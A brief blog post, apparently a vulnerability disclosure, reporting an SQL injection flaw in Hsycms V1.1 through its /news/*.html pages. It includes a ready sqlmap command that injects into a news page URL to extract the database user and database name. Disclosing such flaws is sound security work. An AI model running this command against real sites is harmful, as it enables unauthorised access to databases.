An issue was discovered in Hsycms V1.1 . There is an SQL injection vulnerability via /news/*.html page

1. The attacker opens http://127.0.0.1/news/*.html," * " Represents any existing page.

2.Then use sqlmap to attack the page.

sqlmap.py -u http://127.0.0.1/news/151*.html --batch --current-user --current-db

 

posted @ 2019-03-18 12:48 Se7en呦 阅读(...) 评论(...) 编辑 收藏